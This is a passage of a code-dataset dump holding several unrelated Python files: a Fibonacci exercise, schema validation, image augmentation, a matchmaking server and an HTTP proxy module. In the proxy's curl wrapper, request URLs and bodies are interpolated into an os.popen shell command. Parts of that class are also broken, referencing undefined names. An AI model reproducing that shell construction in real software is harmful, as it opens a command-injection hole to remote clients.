index=False)\n","repo_name":"MorganBDT/crumb","sub_path":"dataloaders/icubworldtransf_dirmap.py","file_name":"icubworldtransf_dirmap.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35437833524","text":"def fib(n):\n if n == 0:\n return 1\n elif n == 1:\n return 1\n elif n > 1:\n return fib(n-1) + fib(n-2)\n else:\n return 0 \n\nlista = [] \nfor i in range(20):\n lista.append(fib(i)) #append junta \nprint(lista)\n\ndef fib_iterativa(n):\n lista = []\n for i in range(n):\n if i == 0:\n lista.append(1)\n\n elif i == 1:\n lista. append(1)\n\n elif i > 1:\n lista.append(lista[-1] + lista[-2])\n\n return lista[-1]\n \n","repo_name":"a97160/ATP2122--a97160","sub_path":"Exercícios Aula Teórica.py","file_name":"Exercícios Aula Teórica.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17943569171","text":"from schema import Schema, And, Use, Optional, SchemaError\nfrom flask import request\nfrom .status_responses import bad_request\nfrom functools import wraps\nfrom typing import Callable\n\n#Prevent redundancy and improve readibility\nstr_lower_strip = str, Use(str.lower), Use(str.strip)\n\n\nsupported_metrics = ('g','ml')\ndef metric_is_supported(metric:str) -> bool: \n return metric in supported_metrics\n\nIngredientsSchema = Schema([{'name': And(*str_lower_strip),\n 'amount': Use(int),\n 'metric': And(*str_lower_strip, metric_is_supported,\n error=f\"'ingredients' key 'metric' value '{{}}' should be one of the following strings: {supported_metrics}\")}])\n \nCreateRecipeSchema = Schema({'name': And(*str_lower_strip),\n 'ingredients': IngredientsSchema,\n Optional('steps'): {Use(int):str}})\n\nEditRecipeSchema = Schema({'name': And(*str_lower_strip),\n Optional('ingredients'): IngredientsSchema,\n Optional('steps'): {Use(int):str}})\n\ndef validate_schema(schema:Schema) -> Callable:\n def func_wrapper(f:Callable) -> Callable:\n @wraps(f)\n def wrapper(*args, **kwargs) -> Callable:\n try:\n schema.validate(request.json)\n\n # The following validations/transformations could not be expressed using the schema library\n if 'ingredients' in request.json:\n # Validate length of ingredients is not 0\n if len(request.json['ingredients'])==0:\n raise SchemaError('The number of ingredients can not be 0.')\n # Cast ingredients into a string after validating\n request.json['ingredients'] = str(request.json['ingredients'])\n\n\n except SchemaError as e:\n return bad_request(request.path, additional_message=(\"The JSON data sent does not conform to the expected schema.\\n\" \n f\"Please review documentation and see the following exception: {e}\"))\n else:\n return f(*args, **kwargs)\n return wrapper\n return func_wrapper\n","repo_name":"trutik/RecipeAPI","sub_path":"recipeapi/api/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42789589994","text":"from random import randrange\n\ndef dollar(a):\n b = '$' + str(round(a,2))\n return b\nprint(dollar(1.2342))\n\n# -----\n\n\ndef lens(n, R1, R2, d):\n f = ((n-1) * ((1/R1) - (1/R2) + ((n-1)*d) / (n*R1*R2)))**-1\n return round(f,2)\n\nprint(lens(1.2, 10, 10, .2))\n\n# -----\n\n\ndef scramble(word):\n\n if len(word) > 3:\n rand_letter_1 = randrange(1, len(word)-1)\n rand_letter_2 = randrange(1, len(word)-1)\n\n while rand_letter_2 == rand_letter_1:\n rand_letter_2 = randrange(1, len(word)-1)\n\n word_str = list(word)\n word_str[rand_letter_2], word_str[rand_letter_1] = word_str[rand_letter_1], word_str[rand_letter_2]\n word = ''.join(word_str)\n\n return word\n\nprint(scramble('hello'))\n\n# -----\n\n\ndef build_sentence(sentence):\n\n words = sentence.split()\n sentence_out = []\n\n for i in words:\n sentence_out.append(scramble(i))\n sentence_out.append(' ')\n\n sentence_out = ''.join(sentence_out)\n return sentence_out\n\na = build_sentence('yes I would like that')\nprint(a)","repo_name":"mastertweed/Python","sub_path":"ECE203/ECE203 Lab4/ECE203 Lab4'.py","file_name":"ECE203 Lab4'.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33997360050","text":"import tensorflow as tf\nfrom pathlib import Path\nimport uuid\n\nfrom typing import Union\n\nfrom .constants import DEFAULT_MODEL_NAME, DEFAULT_PRED_THRESHOLD, DEFAULT_ARG_THREHSOLD, DEFAULT_SENTENCE_SIZE\nfrom .argument_prediction import ArgumentPredictor\nfrom .predicate_extraction import PredicateExtractor\nfrom .data_formatter import DataFormatter\n\n\nclass TripleExtractor(DataFormatter):\n def __init__(self, pe_layers_or_name: Union[tuple[int], str], ap_layers_or_name: Union[tuple[int], str], sentence_size: int = DEFAULT_SENTENCE_SIZE) -> None:\n if isinstance(pe_layers_or_name, str):\n self.predicate_extractor = PredicateExtractor.load(pe_layers_or_name)\n else:\n self.predicate_extractor = PredicateExtractor(*pe_layers_or_name, sentence_size=sentence_size)\n\n if isinstance(ap_layers_or_name, str):\n self.argument_predictor = ArgumentPredictor.load(ap_layers_or_name)\n else:\n self.argument_predictor = ArgumentPredictor(*ap_layers_or_name, sentence_size=sentence_size)\n\n @classmethod\n def load(cls, name: str = DEFAULT_MODEL_NAME):\n return cls(name, name)\n\n def save(self, name: str = DEFAULT_MODEL_NAME):\n self.predicate_extractor.save(name)\n self.argument_predictor.save(name)\n\n def compile(self, pe_optimizer=None, pe_loss=None, pe_metrics=None, ap_optimizer=None, ap_loss=None,\n ap_metrics=None):\n default_optimizer = tf.keras.optimizers.SGD(learning_rate=0.01)\n default_loss = tf.keras.losses.CategoricalCrossentropy()\n default_metrics = [tf.keras.metrics.CategoricalCrossentropy()]\n\n pe_optimizer = pe_optimizer or ap_optimizer or default_optimizer\n pe_loss = pe_loss or ap_loss or default_loss\n pe_metrics = pe_metrics or ap_metrics or default_metrics\n\n ap_optimizer = ap_optimizer or pe_optimizer or default_optimizer\n ap_loss = ap_loss or pe_loss or default_loss\n ap_metrics = ap_metrics or pe_metrics or default_metrics\n\n self.predicate_extractor.compile(optimizer=pe_optimizer, loss=pe_loss, metrics=pe_metrics)\n self.argument_predictor.compile(optimizer=ap_optimizer, loss=ap_loss, metrics=ap_metrics)\n\n def summary(self):\n self.predicate_extractor.summary()\n self.argument_predictor.summary()\n\n def fit(self, training_sentences, *args, merge_repeated=False, epochs=20, pe_epochs=None, ap_epochs=None,\n early_stopping=False, callbacks=None, **kwargs):\n pe_epochs = pe_epochs or epochs\n ap_epochs = ap_epochs or epochs\n\n print(\"Predicate Extractor:\")\n self.predicate_extractor.fit(training_sentences, *args, merge_repeated=merge_repeated, epochs=pe_epochs,\n early_stopping=early_stopping, callbacks=callbacks, **kwargs)\n print(\"\\nArgument predictor:\")\n self.argument_predictor.fit(training_sentences, *args, merge_repeated=merge_repeated, epochs=ap_epochs,\n early_stopping=early_stopping, callbacks=callbacks, **kwargs)\n\n def predict(self, sentences: list[str], pred_threshold=DEFAULT_PRED_THRESHOLD,\n arg_threshold=DEFAULT_ARG_THREHSOLD):\n arg_pred_inputs = self.predicate_extractor(sentences, acceptance_threshold=pred_threshold)\n outputs = self.argument_predictor(arg_pred_inputs, acceptance_threshold=arg_threshold)\n return outputs\n\n def annotate_sentences(self, sentences: list[str], pred_threshold=DEFAULT_PRED_THRESHOLD,\n arg_threshold=DEFAULT_ARG_THREHSOLD):\n outputs = self.predict(sentences, pred_threshold=pred_threshold, arg_threshold=arg_threshold)\n for sentence_id, tokens, pred_masks, subj_mask, obj_mask in outputs:\n annotation = self.build_annotation(sentence_id, tokens, pred_masks, subj_mask, obj_mask)\n print(annotation)\n print()\n\n def gen_csv(self, sentences: list[str], filepath: Path, pred_threshold=DEFAULT_PRED_THRESHOLD,\n arg_threshold=DEFAULT_ARG_THREHSOLD, title='', id_prefix=''):\n outputs = self.predict(sentences, pred_threshold=pred_threshold, arg_threshold=arg_threshold)\n df = self.build_df(outputs, id_prefix=id_prefix)\n with filepath.open('w', encoding=\"utf-8\") as f:\n f.write(f\"# {title}\\n\")\n df.to_csv(f, sep=\";\", index=False, lineterminator='\\n')\n return df\n\n def process_doc(self, doc_path: Path, csv_path: Union[Path, None] = None,\n pred_threshold=DEFAULT_PRED_THRESHOLD, arg_threshold=DEFAULT_ARG_THREHSOLD):\n csv_path = csv_path or doc_path.with_suffix('.csv')\n\n with doc_path.open(encoding=\"utf-8\") as f:\n doc = f.read()\n sentences = self.doc_to_sentences(doc)\n id_prefix = str(uuid.uuid4())\n\n return self.gen_csv(\n sentences,\n csv_path,\n title=doc_path.as_posix(),\n id_prefix=id_prefix,\n pred_threshold=pred_threshold,\n arg_threshold=arg_threshold\n )\n\n def process_docs(self, doc_dir: list[Path], csv_dir: Path,\n pred_threshold=DEFAULT_PRED_THRESHOLD, arg_threshold=DEFAULT_ARG_THREHSOLD):\n for doc_path in doc_dir:\n self.process_doc(\n doc_path,\n (csv_dir / doc_path.stem).with_suffix(\".csv\"),\n pred_threshold=pred_threshold,\n arg_threshold=arg_threshold\n )\n","repo_name":"Pligabue/PTBR-OpenIE","sub_path":"triple_extractor_ptbr_pligabue/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19547799004","text":"import pandas as pd\nimport numpy as np\nfrom skimage import io\nfrom skimage.transform import rotate\nimport cv2\nimport os\nimport time\n\next = '.jpeg'\n\n\ndef rotate_images(file_path, degrees_of_rotation, lst_imgs):\n '''\n Rotates image based on a specified amount of degrees\n\n INPUT\n file_path: file path to the folder containing images.\n degrees_of_rotation: Integer, specifying degrees to rotate the\n image. Set number from 1 to 360.\n lst_imgs: list of image strings.\n\n OUTPUT\n Images rotated by the degrees of rotation specififed.\n '''\n new_img_lis = []\n for l in lst_imgs:\n img = io.imread(file_path + str(l))\n for deg in degrees_of_rotation:\n img = rotate(img, deg)\n f_name = file_path + str(l).rstrip(ext) + '_' + str(deg) + ext\n io.imsave(f_name, img)\n new_img_lis.append(f_name)\n return new_img_lis\n\n\ndef mirror_images(file_path, mirror_direction, lst_imgs):\n '''\n Mirrors image left or right, based on criteria specified.\n\n INPUT\n file_path: file path to the folder containing images.\n mirror_direction: criteria for mirroring left or right.\n lst_imgs: list of image strings.\n\n OUTPUT\n Images mirrored left or right.\n '''\n new_img_lis = []\n\n for l in lst_imgs:\n img = cv2.imread(file_path + str(l))\n img = cv2.flip(img, mirror_direction)\n f_name = file_path + str(l).rstrip(ext) + '_mir' + ext\n cv2.imwrite(f_name, img)\n new_img_lis.append(f_name)\n return new_img_lis\n\n\nif __name__ == '__main__':\n start_time = time.time()\n print(os.listdir(r'./Data'))\n trainLabels = pd.read_csv(r\"./Data/trainLabels_master_v2.csv\")\n\n # trainLabels['image'] = trainLabels['image'].str.rstrip('.jpeg') tesing\n trainLabels_no_DR = trainLabels[trainLabels['level'] == 0]\n trainLabels_DR = trainLabels[trainLabels['level'] >= 1]\n\n path = r'./Data/train_cp/'\n\n lst_imgs_no_DR = [i for i in trainLabels_no_DR['image']]\n lst_imgs_DR = [i for i in trainLabels_DR['image']]\n\n # lst_sample = [i for i in os.listdir('../data/sample/') if i != '.DS_Store'] test\n # lst_sample = [str(l.strip('.jpeg')) for l in lst_sample] test\n\n # Mirror Images with no DR one time\n print(\"Mirroring Non-DR Images\")\n lst_imgs_no_DR.extend(mirror_images(path, 1, lst_imgs_no_DR))\n\n # Rotate all images that have any level of DR\n lst_imgs_DR_temp = []\n print(\"Rotating DR images to 70, 100, 160 and 250 Degrees\")\n lst_imgs_DR_temp.extend(rotate_images(\n path, [70, 100, 160, 250], lst_imgs_DR))\n\n print(\"Mirroring DR Images\")\n lst_imgs_DR_temp.extend(mirror_images(path, 0, lst_imgs_DR))\n\n lst_imgs_DR.extend(lst_imgs_DR_temp)\n\n print(\"Updating the CSV Index\")\n\n lst_imgs_no_DR_with_labels = np.column_stack(\n (np.array(lst_imgs_no_DR), np.zeros((len(lst_imgs_no_DR),), dtype=int)))\n lst_imgs_DR_with_labels = np.column_stack(\n (np.array(lst_imgs_DR), np.ones((len(lst_imgs_DR),), dtype=int)))\n\n print(\"No-DR images Augmented: \", len(lst_imgs_no_DR_with_labels))\n print(\"DR images Augmented: \", len(lst_imgs_DR_with_labels))\n\n image_data_all = np.concatenate(\n (lst_imgs_no_DR_with_labels, lst_imgs_DR_with_labels), axis=0)\n df = pd.DataFrame(image_data_all, columns=['image', 'level'])\n df.to_csv(r'./Data/trainLabels_master_v4_final.csv')\n print(\"Completed\")\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"AbdullahJanKhan/isee","sub_path":"dr_model/training/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35348229632","text":"\"\"\"\nFlashCourses Decks & Cards REST API Class-Based URLs\n\nFile Path: /flash/src/flashcards/api/urls.py\n\nModified By: Patrick R. McElhiney\nDate Modified: 4/16/2018\n\"\"\"\n\nfrom django.urls import path\nfrom . import views\n\nfrom .views import (\n CreateDeckAPIView,\n RetrieveDeckAPIView,\n ListDeckAPIView,\n DestroyDeckAPIView,\n UpdateDeckAPIView,\n DetailDeckAPIView,\n CreateCardAPIView,\n RetrieveCardAPIView,\n ListCardAPIView,\n DestroyCardAPIView,\n UpdateCardAPIView,\n)\n\napp_name = 'flashcards_api'\n\nurlpatterns = [\n path('deck/create/', views.CreateDeckAPIView.as_view(), name='deck_create'),\n path('deck/retrieve/', views.RetrieveDeckAPIView.as_view(), name='deck_retrieve'),\n path('deck/list/', views.ListDeckAPIView.as_view(), name='deck_list'),\n path('deck/delete/', views.DestroyDeckAPIView.as_view(), name='deck_delete'),\n path('deck/update/', views.UpdateDeckAPIView.as_view(), name='deck_update'),\n path('deck/detail/', views.DetailDeckAPIView.as_view(), name='deck_detail'),\n path('card/create/', views.CreateCardAPIView.as_view(), name='card_create'),\n path('card/retrieve/', views.RetrieveCardAPIView.as_view(), name='card_retrieve'),\n path('card/list/', views.ListCardAPIView.as_view(), name='card_list'),\n path('card/delete/', views.DestroyCardAPIView.as_view(), name='card_delete'),\n path('card/update/', views.UpdateCardAPIView.as_view(), name='card_update')\n]\n\n","repo_name":"dmc1049/flashcourses","sub_path":"flash/src/flashcards/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35098589647","text":"import glob\nimport sys\nsys.path.insert(0, glob.glob('../../')[0])\n\nfrom match_service import Match\nfrom match_service.ttypes import Player\n\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\nfrom thrift.server import TServer\n\nfrom queue import Queue\nfrom time import sleep\nfrom threading import Thread\n\nfrom ai_game_platform.asgi import channel_layer\nfrom asgiref.sync import async_to_sync\nfrom django.core.cache import cache\n\nqueue = Queue() # 消息队列\n\nclass Operate:\n def __init__(self, type, player):\n self.type = type\n self.player = player\n\nclass Pool:\n def __init__(self):\n self.players = []\n self.wt = []\n\n def add_player(self, player):\n self.players.append(player)\n self.wt.append(0)\n gameCnt = cache.get('game_cnt', 0)\n if gameCnt >= 5:\n async_to_sync(channel_layer.group_send) (\n \"matching-player-%d\" % player.id,\n {\n 'type': \"group_send_event\",\n 'event': \"prompt\",\n 'prompt': \"由于当前平台资源不足, 正在进行>=5场游戏,请耐心等待...\",\n }\n )\n\n def remove_player(self, player):\n for i in range(len(self.players)):\n if self.players[i].id == player.id:\n del self.players[i]\n del self.wt[i]\n print(\"删除%d成功\" % i)\n break\n\n def check_match(self, i, j):\n playerA = self.players[i]\n playerB = self.players[j]\n if playerA.game_id != playerB.game_id: return False\n # 防止相同玩家匹配在一起\n if playerA.id == playerB.id:\n return False\n dt = abs(playerA.rating - playerB.rating)\n waitingtime = self.wt[i] if self.wt[i] < self.wt[j] else self.wt[j]\n return dt <= waitingtime * 50\n\n def match_success(self, ps):\n print(\"Match Success: %s %s\" % (ps[0].username, ps[1].username))\n room_name = \"room-%s-%s\" % (ps[0].id, ps[1].id)\n type = \"\"\n if ps[0].game_id == 1:\n type = \"start_gobang_game\"\n cache.set('gobang_matching_players', cache.get('gobang_matching_players', 0) - len(ps))\n elif ps[0].game_id == 2:\n type = \"start_snake_game\"\n cache.set('snake_matching_players', cache.get('snake_matching_players', 0) - len(ps))\n elif ps[0].game_id == 3:\n type = \"start_reversi_game\"\n cache.set('reversi_matching_players', cache.get('reversi_matching_players', 0) - len(ps))\n players = []\n for p in ps:\n async_to_sync(channel_layer.group_discard)(\"matching-player-%d\" % p.id, p.channel_name)\n async_to_sync(channel_layer.group_add)(room_name, p.channel_name)\n players.append({\n 'username': p.username,\n 'photo': p.photo,\n })\n cache.set(room_name, players, 3600) # 有效时间: 一小时\n async_to_sync(channel_layer.group_send) (\n room_name,\n {\n 'type': type,\n 'room_name': room_name,\n 'a_id': ps[0].id,\n 'a_username': ps[0].username,\n 'a_photo': ps[0].photo,\n 'a_operate': ps[0].operate,\n 'a_bot_id': ps[0].bot_id,\n 'b_id': ps[1].id,\n 'b_username': ps[1].username,\n 'b_photo': ps[1].photo,\n 'b_operate': ps[1].operate,\n 'b_bot_id': ps[1].bot_id\n }\n )\n\n\n def increase_waiting_time(self):\n for i in range(len(self.wt)):\n self.wt[i] += 1\n\n def match(self):\n if cache.get('game_cnt', 0) >= 5: return\n\n while len(self.players) > 1:\n flag = False\n for i in range(len(self.players)):\n for j in range(i + 1, len(self.players)):\n if self.check_match(i, j):\n playerA = self.players[i]\n playerB = self.players[j]\n self.match_success([playerA, playerB])\n self.players = self.players[:i] + self.players[i + 1:j] + self.players[j + 1:]\n self.wt = self.wt[:i] + self.wt[i + 1:j] + self.wt[j + 1:]\n flag = True\n break\n if flag: break\n if not flag: break\n if cache.get('game_cnt', 0) >= 5: break\n self.increase_waiting_time()\n\nclass MatchHandler:\n def add_player(self, player):\n print(\"Add Player: %s %d\" % (player.username, player.rating))\n op = Operate(\"add\", player)\n queue.put(op)\n return 0\n\n def remove_player(self, player):\n print(\"Remove Player: %s %d\" % (player.username, player.rating));\n op = Operate(\"remove\", player)\n queue.put(op)\n return 0\n\ndef get_operate_from_queue():\n try:\n return queue.get_nowait()\n except:\n return None\n\ndef worker():\n pool = Pool()\n while True:\n op = get_operate_from_queue()\n if op:\n if op.type == \"add\":\n pool.add_player(op.player)\n else:\n pool.remove_player(op.player)\n else:\n pool.match()\n sleep(1)\n\nif __name__ == '__main__':\n handler = MatchHandler()\n processor = Match.Processor(handler)\n transport = TSocket.TServerSocket(host='127.0.0.1', port=9091)\n tfactory = TTransport.TBufferedTransportFactory()\n pfactory = TBinaryProtocol.TBinaryProtocolFactory()\n\n server = TServer.TThreadedServer(processor, transport, tfactory, pfactory)\n\n Thread(target=worker, daemon=True).start() # 开一个线程\n\n print('Starting the server...')\n server.serve()\n print('done.')\n","repo_name":"ZzqForCoding/ai_game","sub_path":"ai_game_backend_code/match_system/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"40129405950","text":"#!/usr/bin/env python\n# Encoding: iso-8859-1\n# -----------------------------------------------------------------------------\n# Project : Retro - HTTP Toolkit\n# -----------------------------------------------------------------------------\n# Author : Sebastien Pierre \n# License : Revised BSD License\n# -----------------------------------------------------------------------------\n# Creation : 12-Apr-2006\n# Last mod : 08-Jan-2016\n# -----------------------------------------------------------------------------\n\nimport os\nimport sys\nimport time\nfrom os.path import abspath, dirname, join\nfrom retro import *\nfrom retro.wsgi import SERVER_ERROR_CSS\n\nDEFAULT_PORT = 8000\n\n# ------------------------------------------------------------------------------\n#\n# PROXY COMPONENT\n#\n# ------------------------------------------------------------------------------\n\n\nclass Proxy:\n \"\"\"A basic (forwarding) proxy implementation that is used by the\n ProxyService in this module.\"\"\"\n\n THROTTLING = 0\n\n def requestAsString(self, method, server, port, uri, headers, body):\n headers = (\"%s: %s\" % (h[0], h[1])\n for h in list(headers.items()) if h[1] != None)\n return (\n \"%s %s:%s %s\\n\"\n \"%s\\n\\n\"\n \"%s\\n\\n\"\n ) % (method, server, port, uri, \"\\n\".join(headers), body)\n\n def filterHeaders(self, headers):\n res = {}\n for name, value in list(headers.items()):\n if value != None:\n res[name] = value\n return res\n\n def proxyGET(self, request, server, port, uri, parameters):\n # print self.requestAsString(request.method(), server, port, uri, request.headers, request.body())\n status, headers, body = self.httpRequest(\n server, port, \"GET\", uri, headers=self.filterHeaders(request.headers))\n return request.respond(content=body, headers=headers, status=status)\n\n def proxyPOST(self, request, server, port, uri):\n # print self.requestAsString(request.method(), server, port, uri, request.headers, request.body())\n status, headers, body = self.httpRequest(\n server, port, \"POST\", uri, body=request.body(), headers=self.filterHeaders(request.headers))\n return request.respond(content=body, headers=headers, status=status)\n\n def proxyPUT(self, request, server, port, uri):\n # print self.requestAsString(request.method(), server, port, uri, request.headers, request.body())\n status, headers, body = self.httpRequest(\n server, port, \"PUT\", uri, body=request.body(), headers=self.filterHeaders(request.headers))\n return request.respond(content=body, headers=headers, status=status)\n\n def proxyDELETE(self, request, server, port, uri):\n # print self.requestAsString(request.method(), server, port, uri, request.headers, request.body())\n status, headers, body = self.httpRequest(\n server, port, \"DELETE\", uri, body=request.body(), headers=self.filterHeaders(request.headers))\n return request.respond(content=body, headers=headers, status=status)\n\n def hasBackend(self):\n return True\n\n def httpRequest(self, server, port, method, url, body=\"\", headers=None):\n # NOTE: This is not fast at all, but it works!\n import wwwclient\n import wwwclient.defaultclient\n s = wwwclient.Session(client=wwwclient.defaultclient.HTTPClient)\n url = \"http://{0}:{1}{2}\".format(server, port, url)\n print(\"[PROXY] {0}\".format(url))\n t = getattr(s, method.lower())(url)\n data = t.data()\n if self.THROTTLING > 0:\n bytes_per_second = int(self.THROTTLING * 1000.0)\n\n def throttling_wrapper():\n i = 0\n while i < len(data):\n if i > 0:\n time.sleep(1)\n j = min(len(data), i + bytes_per_second)\n yield data[i:j]\n i = j\n res = throttling_wrapper()\n return 200, t.headers, data\n\n # NOTE: This does not seem to work properly..., so disabled for now\n # def _httpRequest( self, server, port, method, url, body=\"\", headers=None ):\n #\timport httplib\n #\tconn = httplib.HTTPConnection(server, int(port))\n #\tconn.request(method, url, body, headers or {})\n #\tprint \"[PROXY] {0} {1}:{2}{3}\".format(method, server, port, url)\n #\tresp = conn.getresponse()\n #\tdata = resp.read()\n #\tres = data\n #\tif self.THROTTLING > 0:\n #\t\tbytes_per_second = int(self.THROTTLING * 1000.0)\n #\t\tdef throttling_wrapper():\n #\t\t\ti = 0\n #\t\t\twhile i < len(data):\n #\t\t\t\tif i > 0:\n #\t\t\t\t\ttime.sleep(1)\n #\t\t\t\tj = min(len(data), i + bytes_per_second)\n #\t\t\t\tyield data[i:j]\n #\t\t\t\ti = j\n #\t\tres = throttling_wrapper()\n #\treturn resp.status, resp.getheaders(), res\n\n# FIXME: Use Proxy properly\n\n\nclass ProxyService(Component, Proxy):\n \"\"\"This is the main component of the Proxy. It basically provided a wrapper\n around the 'curl' command line application that allows basic proxying of\n requests, and serving of local files.\"\"\"\n\n def __init__(self, proxyTo, prefix=\"/\", user=None, password=None, throttling=0):\n # TODO: Add headers processing here\n \"\"\"Creates a new proxy that will proxy to the URL indicated by\n 'proxyTo'.\"\"\"\n Component.__init__(self, name=\"Proxy\")\n # NOTE: parseURL is actually urllib3.util.parse_url, which is much\n # better than urlparse.urlparse.\n url = parseURL(proxyTo)\n self._scheme = url.scheme or \"http\"\n self._host = url.host or \"localhost\"\n self._port = url.port or 80\n self._uri = url.path or \"/\"\n self.PREFIX = prefix\n self.user = user\n self.THROTTLING = int(throttling)\n if user and password:\n self.user += \":\" + password\n\n @on(GET=\"?{parameters}\", priority=\"10\")\n @on(GET=\"{rest:rest}?{parameters}\", priority=\"10\")\n def proxyGet(self, request, rest=None, parameters=None):\n return self._proxy(request, \"GET\", rest, parameters)\n\n @on(POST=\"?{parameters}\", priority=\"10\")\n @on(POST=\"{rest:rest}?{parameters}\", priority=\"10\")\n def proxyPost(self, request, rest=None, parameters=None):\n return self._proxy(request, \"POST\", rest, parameters)\n\n @on(PUT=\"?{parameters}\", priority=\"10\")\n @on(PUT=\"{rest:rest}?{parameters}\", priority=\"10\")\n def proxyPut(self, request, rest=None, parameters=None):\n return self._proxy(request, \"PUT\", rest, parameters)\n\n @on(DELETE=\"?{parameters}\", priority=\"10\")\n @on(DELETE=\"{rest:rest}?{parameters}\", priority=\"10\")\n def proxyDelete(self, request, rest=None, parameters=None):\n return self._proxy(request, \"DELETE\", rest, parameters)\n\n def _proxy(self, request, method, rest, parameters):\n rest = rest or \"\"\n dest_uri = self._uri + rest\n while dest_uri.endswith(\"//\"):\n dest_uri = dest_uri[:-1]\n # We get the parameters as-is from the request URI (parameters is ignored\n uri_params = request.uri().split(\"?\", 1)\n if len(uri_params) == 2:\n if not dest_uri.endswith(\"?\"):\n dest_uri += \"?\"\n dest_uri += uri_params[1]\n status, headers, body = self.httpRequest(\n self._host, self._port, method, dest_uri, body=request.body(), headers=self.filterHeaders(request.headers))\n # TODO: We have a redirect, so we have to rewrite it\n if status == 302:\n pass\n return request.respond(content=body, headers=headers, status=status)\n\n# ------------------------------------------------------------------------------\n#\n# WWW-CLIENT PROXY COMPONENT\n#\n# ------------------------------------------------------------------------------\n\n\nclass WWWClientProxy(ProxyService):\n\n def start(self):\n \"\"\"Starts the component, checking if the 'curl' utility is available.\"\"\"\n if not self.hasCurl():\n raise Exception(\"wwwclient is required.\")\n\n @on(GET=\"/{rest:rest}?{parameters}\", priority=\"10\")\n def proxyGet(self, request, rest, parameters):\n uri = request.uri()\n i = uri.find(rest)\n assert i >= 0\n uri = uri[i:]\n wwwclient.browse.Session(\n self._proxyTo, client=wwwclient.curlclient.HTTPClient).get(uri)\n # TODO: Add headers processing here\n return request.respond(content=result, headers=[(\"Content-Type\", ctype)], status=code)\n\n @on(POST=\"/{rest:rest}\", priority=\"10\")\n def proxyPost(self, request, rest):\n uri = request.uri()\n i = uri.find(rest)\n assert i >= 0\n uri = uri[i:]\n result, ctype, code = self._curl(\n self._proxyTo, \"POST\", uri, body=request.body())\n # TODO: Add headers processing here\n return request.respond(content=result, headers=[(\"Content-Type\", ctype)], status=code)\n\n # CURL WRAPPER\n # ____________________________________________________________________________\n\n def hasWWWClient(self):\n \"\"\"Tells if the 'curl' command-line utility is avialable.\"\"\"\n import wwwclient\n return wwwclient\n\n def _curlCommand(self):\n base = \"curl \"\n if self.user:\n base += \" --anyauth -u%s \" % (self.user)\n base += \" -s -w\"\n return base\n\n def _curl(self, server, method, url, body=\"\"):\n \"\"\"This function uses os.popen to communicate with the 'curl'\n command-line client and to GET or POST requests to the given server.\"\"\"\n c = self._curlCommand()\n if method == \"GET\":\n command = c + \\\n \"'\\n\\n%{content_type}\\n\\n%{http_code}'\" + \\\n \" '%s/%s'\" % (server, url)\n result = os.popen(command).read()\n else:\n command = c + \"'\\n\\n%{content_type}\\n\\n%{http_code}'\" + \\\n \" '%s/%s' -d '%s'\" % (server, url, body)\n result = os.popen(command).read()\n code_start = result.rfind(\"\\n\\n\")\n code = result[code_start+2:]\n result = result[:code_start]\n ctype_start = result.rfind(\"\\n\\n\")\n ctype = result[ctype_start+2:]\n result = result[:ctype_start]\n return result, ctype, code\n\n# ------------------------------------------------------------------------------\n#\n# MAIN\n#\n# ------------------------------------------------------------------------------\n\n\ndef createProxies(args, options=None):\n \"\"\"Create proxy components from a list of arguments like\n\n > {prefix}={url}\n > {prefix}={user}:{password}@{url}\n \"\"\"\n components = []\n options = options or {}\n throttling = int(options.get(\"throttling\") or DEFAULT_PORT)\n for arg in args:\n prefix, url = arg.split(\"=\", 1)\n if url.find(\"@\") != -1:\n user, url = url.split(\"@\", 1)\n user, passwd = user.split(\":\", 1)\n print(\"Proxying %s:%s@%s as %s\" % (user, passwd, url, prefix))\n else:\n user, passwd = None, None\n print(\"Proxying %s as %s\" % (url, prefix))\n components.append(ProxyService(url, prefix, user=user,\n password=passwd, throttling=throttling))\n return components\n\n\ndef run(args):\n if type(args) not in (type([]), type(())):\n args = [args]\n from optparse import OptionParser\n # We create the parse and register the options\n oparser = OptionParser(version=\"Retro[+proxy]\")\n oparser.add_option(\"-p\", \"--port\", action=\"store\", dest=\"port\",\n help=OPT_PORT, default=DEFAULT_PORT)\n oparser.add_option(\"-f\", \"--files\", action=\"store_true\", dest=\"files\",\n help=\"Server local files\", default=None)\n oparser.add_option(\"-t\", \"--throttle\", action=\"store\", dest=\"throttling\",\n help=\"Throttles connection speed (in Kbytes/second)\", default=0)\n # We parse the options and arguments\n options, args = oparser.parse_args(args=args)\n if len(args) == 0:\n print(\"The URL to proxy is expected as first argument\")\n return False\n components = createProxies(args, dict(\n port=options.port, throttling=options.throttling, files=options.files))\n if options.files:\n import retro.contrib.localfiles\n print(\"Serving local files...\")\n components.append(retro.contrib.localfiles.LocalFiles())\n app = Application(components=components)\n import retro\n return retro.run(app=app, sessions=False, port=int(options.port))\n\n# -----------------------------------------------------------------------------\n#\n# Main\n#\n# -----------------------------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n run(sys.argv[1:])\n\n# EOF\n","repo_name":"sebastien/retro","sub_path":"src/py/retro/contrib/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":12752,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"15214284497","text":"import matplotlib.pyplot as 